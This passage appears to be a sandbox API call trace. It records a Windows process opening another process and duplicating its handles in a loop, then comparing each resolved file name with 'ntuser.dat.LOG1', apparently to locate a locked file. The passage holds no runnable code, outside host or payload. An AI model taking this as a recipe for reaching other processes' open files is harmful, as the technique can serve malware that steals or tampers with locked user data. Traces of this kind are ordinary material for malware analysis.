CloseHandle (hObject=0x1e4) returned 1 [0161.417] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.417] CloseHandle (hObject=0x194) returned 1 [0161.417] CloseHandle (hObject=0x1e8) returned 1 [0161.417] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.417] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.419] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.420] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.420] CloseHandle (hObject=0x1e4) returned 1 [0161.420] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.420] CloseHandle (hObject=0x194) returned 1 [0161.420] CloseHandle (hObject=0x1e8) returned 1 [0161.421] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.421] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.421] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.422] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.422] CloseHandle (hObject=0x1e4) returned 1 [0161.422] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.422] CloseHandle (hObject=0x194) returned 1 [0161.422] CloseHandle (hObject=0x1e8) returned 1 [0161.422] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.422] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.423] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.424] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.424] CloseHandle (hObject=0x1e4) returned 1 [0161.424] _wcsicmp (_Str1="\\Burn", _Str2="\\ntuser.dat.LOG1") returned -12 [0161.424] CloseHandle (hObject=0x194) returned 1 [0161.424] CloseHandle (hObject=0x1e8) returned 1 [0161.424] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.424] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.425] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.426] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.426] CloseHandle (hObject=0x1e4) returned 1 [0161.426] _wcsicmp (_Str1="\\Burn", _Str2="\\ntuser.dat.LOG1") returned -12 [0161.426] CloseHandle (hObject=0x194) returned 1 [0161.426] CloseHandle (hObject=0x1e8) returned 1 [0161.426] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.426] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x554, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.427] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.428] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.428] CloseHandle (hObject=0x1e4) returned 1 [0161.428] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.428] CloseHandle (hObject=0x194) returned 1 [0161.428] CloseHandle (hObject=0x1e8) returned 1 [0161.428] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.428] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.428] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.429] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.430] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.430] CloseHandle (hObject=0x1e4) returned 1 [0161.430] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.430] CloseHandle (hObject=0x194) returned 1 [0161.430] CloseHandle (hObject=0x1e8) returned 1 [0161.430] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.430] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x58c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.430] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.431] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.432] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.432] CloseHandle (hObject=0x1e4) returned 1 [0161.432] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.432] CloseHandle (hObject=0x194) returned 1 [0161.432] CloseHandle (hObject=0x1e8) returned 1 [0161.432] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.432] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.432] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.433] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.434] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.434] CloseHandle (hObject=0x1e4) returned 1 [0161.434] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.434] CloseHandle (hObject=0x194) returned 1 [0161.434] CloseHandle (hObject=0x1e8) returned 1 [0161.434] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.434] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.434] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.435] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.436] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.436] CloseHandle (hObject=0x1e4) returned 1 [0161.436] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.436] CloseHandle (hObject=0x194) returned 1 [0161.436] CloseHandle (hObject=0x1e8) returned 1 [0161.436] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.436] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.449] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.450] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.450] CloseHandle (hObject=0x1e4) returned 1 [0161.450] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.450] CloseHandle (hObject=0x194) returned 1 [0161.451] CloseHandle (hObject=0x1e8) returned 1 [0161.451] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.451] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.451] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.452] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.452] CloseHandle (hObject=0x1e4) returned 1 [0161.452] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.452] CloseHandle (hObject=0x194) returned 1 [0161.452] CloseHandle (hObject=0x1e8) returned 1 [0161.453] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.453] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.453] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.454] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.454] CloseHandle (hObject=0x1e4) returned 1 [0161.454] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\ntuser.dat.LOG1") returned -12 [0161.454] CloseHandle (hObject=0x194) returned 1 [0161.454] CloseHandle (hObject=0x1e8) returned 1 [0161.454] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.454] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.455] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.456] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.456] CloseHandle (hObject=0x1e4) returned 1 [0161.456] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.456] CloseHandle (hObject=0x194) returned 1 [0161.456] CloseHandle (hObject=0x1e8) returned 1 [0161.456] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.456] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.457] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.458] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.458] CloseHandle (hObject=0x1e4) returned 1 [0161.458] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.458] CloseHandle (hObject=0x194) returned 1 [0161.458] CloseHandle (hObject=0x1e8) returned 1 [0161.458] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.458] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.459] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.460] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.460] CloseHandle (hObject=0x1e4) returned 1 [0161.460] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.460] CloseHandle (hObject=0x194) returned 1 [0161.460] CloseHandle (hObject=0x1e8) returned 1 [0161.460] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.460] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.461] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.462] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.462] CloseHandle (hObject=0x1e4) returned 1 [0161.462] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.462] CloseHandle (hObject=0x194) returned 1 [0161.462] CloseHandle (hObject=0x1e8) returned 1 [0161.462] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.462] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.462] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.463] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.463] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.464] CloseHandle (hObject=0x1e4) returned 1 [0161.464] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.464] CloseHandle (hObject=0x194) returned 1 [0161.464] CloseHandle (hObject=0x1e8) returned 1 [0161.464] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.464] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.465] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.465] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.465] CloseHandle (hObject=0x1e4) returned 1 [0161.465] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.465] CloseHandle (hObject=0x194) returned 1 [0161.465] CloseHandle (hObject=0x1e8) returned 1 [0161.466] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.466] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.466] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.467] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.467] CloseHandle (hObject=0x1e4) returned 1 [0161.467] CloseHandle (hObject=0x194) returned 1 [0161.467] CloseHandle (hObject=0x1e8) returned 1 [0161.467] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.468] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.468] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.469] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.469] CloseHandle (hObject=0x1e4) returned 1 [0161.469] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.469] CloseHandle (hObject=0x194) returned 1 [0161.470] CloseHandle (hObject=0x1e8) returned 1 [0161.470] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.470] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.471] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.471] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.471] CloseHandle (hObject=0x1e4) returned 1 [0161.472] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\ntuser.dat.LOG1") returned 2 [0161.472] CloseHandle (hObject=0x194) returned 1 [0161.472] CloseHandle (hObject=0x1e8) returned 1 [0161.472] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.472] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.473] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.473] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.474] CloseHandle (hObject=0x1e4) returned 1 [0161.474] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\ntuser.dat.LOG1") returned 2 [0161.474] CloseHandle (hObject=0x194) returned 1 [0161.474] CloseHandle (hObject=0x1e8) returned 1 [0161.474] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.474] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.475] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.476] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.476] CloseHandle (hObject=0x1e4) returned 1 [0161.476] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.476] CloseHandle (hObject=0x194) returned 1 [0161.476] CloseHandle (hObject=0x1e8) returned 1 [0161.476] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.476] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.476] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.477] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.477] CloseHandle (hObject=0x1e4) returned 1 [0161.477] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -15 [0161.477] CloseHandle (hObject=0x194) returned 1 [0161.477] CloseHandle (hObject=0x1e8) returned 1 [0161.477] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.477] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x948, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.478] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.479] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.479] CloseHandle (hObject=0x1e4) returned 1 [0161.479] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.479] CloseHandle (hObject=0x194) returned 1 [0161.479] CloseHandle (hObject=0x1e8) returned 1 [0161.479] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.479] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.479] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.480] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.484] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.485] CloseHandle (hObject=0x1e4) returned 1 [0161.485] CloseHandle (hObject=0x194) returned 1 [0161.485] CloseHandle (hObject=0x1e8) returned 1 [0161.485] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 